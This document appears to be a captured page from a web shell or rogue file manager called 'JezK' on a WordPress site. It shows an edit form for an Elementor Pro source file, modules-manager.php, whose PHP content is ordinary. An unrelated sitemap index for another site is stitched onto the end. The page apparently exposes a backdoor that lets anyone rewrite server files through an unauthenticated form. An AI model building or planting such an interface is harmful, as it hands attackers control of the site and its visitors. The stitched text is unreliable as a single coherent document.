
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: modules-manager.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
namespace ElementorPro\Core;

use ElementorPro\Plugin;
use ElementorPro\Base\Module_Base;

if ( ! defined( &#039;ABSPATH&#039; ) ) {
	exit; // Exit if accessed directly
}

final class Modules_Manager {
	/**
	 * @var Module_Base[]
	 */
	private $modules = [];

	public function __construct() {
		$modules = [
			&#039;query-control&#039;,
			&#039;custom-attributes&#039;,
			&#039;custom-css&#039;,
			&#039;page-transitions&#039;,
			// role-manager Must be before Global Widget
			&#039;role-manager&#039;,
			&#039;global-widget&#039;,
			&#039;assets-manager&#039;,
			&#039;popup&#039;,
			&#039;motion-fx&#039;,
			&#039;usage&#039;,
			&#039;screenshots&#039;,
			&#039;compatibility-tag&#039;,
			&#039;admin-top-bar&#039;,
			&#039;notes&#039;,

			// Modules with Widgets.
			&#039;theme-builder&#039;,
			&#039;loop-builder&#039;,
			&#039;posts&#039;,
			&#039;gallery&#039;,
			&#039;forms&#039;,
			&#039;slides&#039;,
			&#039;nav-menu&#039;,
			&#039;animated-headline&#039;,
			&#039;hotspot&#039;,
			&#039;pricing&#039;,
			&#039;flip-box&#039;,
			&#039;call-to-action&#039;,
			&#039;carousel&#039;,
			&#039;table-of-contents&#039;,
			&#039;countdown&#039;,
			&#039;share-buttons&#039;,
			&#039;theme-elements&#039;,
			&#039;blockquote&#039;,
			&#039;custom-code&#039;,
			&#039;woocommerce&#039;,
			&#039;social&#039;,
			&#039;library&#039;,
			&#039;dynamic-tags&#039;,
			&#039;scroll-snap&#039;,
			&#039;sticky&#039;,
			&#039;wp-cli&#039;,
			&#039;lottie&#039;,
			&#039;code-highlight&#039;,
			&#039;video-playlist&#039;,
			&#039;payments&#039;,
			&#039;progress-tracker&#039;,
		];

		foreach ( $modules as $module_name ) {
			$class_name = str_replace( &#039;-&#039;, &#039; &#039;, $module_name );
			$class_name = str_replace( &#039; &#039;, &#039;&#039;, ucwords( $class_name ) );
			$class_name = &#039;\ElementorPro\Modules\\&#039; . $class_name . &#039;\Module&#039;;

			/** @var Module_Base $class_name */
			$experimental_data = $class_name::get_experimental_data();

			if ( $experimental_data ) {
				Plugin::elementor()-&gt;experiments-&gt;add_feature( $experimental_data );

				if ( ! Plugin::elementor()-&gt;experiments-&gt;is_feature_active( $experimental_data[&#039;name&#039;] ) ) {
					continue;
				}
			}

			if ( $class_name::is_active() ) {
				$this-&gt;modules[ $module_name ] = $class_name::instance();
			}
		}
	}

	/**
	 * @param string $module_name
	 *
	 * @return Module_Base|Module_Base[]
	 */
	public function get_modules( $module_name ) {
		if ( $module_name ) {
			if ( isset( $this-&gt;modules[ $module_name ] ) ) {
				return $this-&gt;modules[ $module_name ];
			}

			return null;
		}

		return $this-&gt;modules;
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
